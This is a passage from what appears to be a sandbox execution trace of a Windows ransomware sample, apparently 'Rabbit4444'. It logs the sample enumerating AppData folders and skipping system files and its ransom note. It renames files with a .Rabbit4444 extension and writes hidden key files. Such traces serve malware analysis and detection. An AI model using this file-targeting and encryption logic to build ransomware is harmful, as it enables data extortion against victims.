ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0064.667] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0064.668] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0064.668] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0064.668] lstrcpyW (in: lpString1=0x130ebf2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0064.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0064.669] lstrlenW (lpString="roaming.lock") returned 12 [0064.669] lstrlenW (lpString="Rabbit4444") returned 10 [0064.669] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0064.669] lstrlenW (lpString=".dll") returned 4 [0064.669] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0064.669] lstrlenW (lpString=".lnk") returned 4 [0064.669] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0064.669] lstrlenW (lpString=".ini") returned 4 [0064.669] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0064.669] lstrlenW (lpString=".sys") returned 4 [0064.669] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0064.669] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0064.669] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.669] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.669] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0064.670] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0064.670] lstrcpyW (in: lpString1=0x130ebf2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0064.670] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0064.670] lstrlenW (lpString="settings.dat") returned 12 [0064.670] lstrlenW (lpString="Rabbit4444") returned 10 [0064.670] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0064.670] lstrlenW (lpString=".dll") returned 4 [0064.670] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.670] lstrlenW (lpString=".lnk") returned 4 [0064.670] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.670] lstrlenW (lpString=".ini") returned 4 [0064.670] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.670] lstrlenW (lpString=".sys") returned 4 [0064.670] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.670] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.671] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15598158713) returned 1 [0064.671] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0064.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0064.671] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.672] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e178 [0064.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0064.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e178 | out: hHeap=0xe0000) returned 1 [0064.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0064.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e178 [0064.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0064.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e178 | out: hHeap=0xe0000) returned 1 [0064.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0064.675] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15598561357) returned 1 [0064.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0064.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0064.675] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.675] CloseHandle (hObject=0x27c) returned 1 [0064.675] CloseHandle (hObject=0x2a0) returned 1 [0064.675] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 116 [0064.675] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0064.677] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0064.677] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.677] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.678] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.678] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.679] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.679] CloseHandle (hObject=0x2a0) returned 1 [0064.680] CloseHandle (hObject=0x2cc) returned 1 [0064.680] GetCurrentThreadId () returned 0xd98 [0064.680] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0064.680] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState" [0064.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0064.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0064.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState" [0064.680] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\" [0064.680] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0064.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.681] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.683] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.684] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.684] CloseHandle (hObject=0x2cc) returned 1 [0064.685] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState") returned 96 [0064.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.685] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.685] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.685] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.685] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.685] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.685] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.685] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.685] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.685] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.685] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.685] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.685] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe1364d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe1364d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.685] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.685] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe1364d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe1364d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.686] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.686] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.686] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.686] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.686] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.687] CloseHandle (hObject=0x2a0) returned 1 [0064.687] CloseHandle (hObject=0x2cc) returned 1 [0064.687] GetCurrentThreadId () returned 0xd98 [0064.687] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0064.687] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState" [0064.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0064.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState" [0064.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\" [0064.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0064.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.688] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.692] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.693] CloseHandle (hObject=0x2cc) returned 1 [0064.694] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState") returned 94 [0064.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.694] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.694] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.694] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.694] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.694] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.694] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.694] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.694] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.694] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.694] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.694] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.694] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe1364d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe1364d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.694] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.694] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.694] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefe1364d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefe1364d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefe1364d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.694] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.694] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.695] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.695] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.696] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.696] CloseHandle (hObject=0x2a0) returned 1 [0064.696] CloseHandle (hObject=0x2cc) returned 1 [0064.696] GetCurrentThreadId () returned 0xd98 [0064.696] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0064.696] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\LocalCache") 